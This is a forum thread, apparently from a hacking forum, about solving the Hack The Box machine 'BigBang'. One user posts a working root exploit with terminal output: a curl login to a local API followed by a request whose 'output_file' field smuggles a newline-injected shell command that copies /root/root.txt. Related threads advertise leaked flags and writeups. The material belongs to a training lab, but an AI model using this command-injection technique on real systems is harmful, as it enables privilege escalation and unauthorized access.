Possibly Related Threads…

fl00d777 · Jan 27, 2025, 04:27 AM

what? this is so pointless. explain how to get the foothold. that's what really matters. I'm not going to pay for ssh creds to a HTB machine. lol!

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

**RedBlock** · Jan 27, 2025, 04:49 AM

(Jan 27, 2025, 04:27 AM)fl00d777 Wrote: what? this is so pointless. explain how to get the foothold. that's what really matters. I'm not going to pay for ssh creds to a HTB machine. lol!

Don't pay bro
Nobody is forcing you!!!!!

fl00d777 · Jan 27, 2025, 05:13 AM

that's really good advice lol

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching | http://c66go4clkqodr7tdjfu76jztjs7w7d3fajdeypxn73v4ju3dt7g5yyyd.onion/Forum-Ban-Appeals if you feel this is incorrect.

**RedBlock** · Jan 27, 2025, 05:57 AM

added root part also now

0mniscient · Jan 27, 2025, 06:49 AM

I have only user access. And curl not working for root

**RedBlock** · Jan 27, 2025, 06:56 AM

It worked pretty well for me

curl -s -X POST -H 'Content-Type: application/json' -d '{"username":"developer", "password":"bigbang"}' http://localhost:9090/login | grep -oP '"access_token":"\K[^"]+'
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTczNzk1NjY0NCwianRpIjoiYWZmMjdmOTMtMDZiZC00YTNhLWFjYjktMmI2YTllNzYxZGQwIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImRldmVsb3BlciIsIm5iZiI6MTczNzk1NjY0NCwiY3NyZiI6IjY1MzgwNGY1LTA3NzQtNDY1Yy05OWFlLTFjZTRlMmU3OTYxOCIsImV4cCI6MTczNzk2MDI0NH0.GWT2yNTLxGGzY4EznxXC8Q0hCCC_LmhJuiNZE25h3o8
developer@bigbang:~$ curl -s -X POST -H 'Content-Type: application/json' -d '{"username":"developer", "password":"bigbang"}' http://localhost:9090/login | grep -oP '"access_token":"\K[^"]+' | xargs -I {} echo curl -X POST -H 'Authorization: Bearer {}' -H 'Content-Type: application/json' 127.0.0.1:9090/command --data '{"command":"send_image", "output_file":"\ncp --no-preserve=mode,ownership /root/root.txt /home/developer/pwned.txt"}'
curl -X POST -H Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTczNzk1NjY4MywianRpIjoiNjgyM2U2M2UtOTJlYy00MjdjLWFhOWEtZGE5ZjUwNjk2N2MxIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImRldmVsb3BlciIsIm5iZiI6MTczNzk1NjY4MywiY3NyZiI6IjNjY2Q2MTQ4LTcwNmMtNDUyYS1iNjRhLTljNjlmYjQ0YjlhYSIsImV4cCI6MTczNzk2MDI4M30.OhV99QgqJVSdKtY87S9GmhS7HHgG2aglvlkU0SdPJ8E -H Content-Type: application/json 127.0.0.1:9090/command --data {"command":"send_image", "output_file":"\ncp --no-preserve=mode,ownership /root/root.txt /home/developer/pwned.txt"}
developer@bigbang:~$ ls
android pwned.txt
developer@bigbang:~$ cat pwned.txt
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

0x410x420x41 · Jan 27, 2025, 08:06 AM

Hey so you did made the exploit work, care to answer a question about the libc.so.6...

**RedBlock** · Jan 27, 2025, 08:49 AM

For those who want detailed explanation or the writeup DM me.

Art10n · Jan 27, 2025, 08:50 AM

thanks for sharing, bro

**RedBlock** · Jan 27, 2025, 09:55 AM

(Jan 27, 2025, 08:50 AM)Art10n Wrote: thanks for sharing, bro

I don't like the season 7 boxes Sad

Possibly Related Threads…
Thread		Author	Replies	Views	Last Post
	Hack the box Pro Labs, VIP, VIP+ 1 month free Method	RedBlock	23	2,187	2 hours ago Last Post: kkkato
	[FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags	Techtom	20	2,495	Yesterday, 11:06 PM Last Post: op334
	[FREE] HackTheBox All Cheatsheets	Tamarisk	3	398	Yesterday, 10:36 PM Last Post: op334
	[FREE] 300+ Writeups PDF HackTheBox/HTB premium retired	Tamarisk	369	92,015	Yesterday, 04:10 PM Last Post: sabbyahmed
	CBBH Write Ups	hiddenhacker	22	6,229	Yesterday, 06:39 AM Last Post: Usercomplex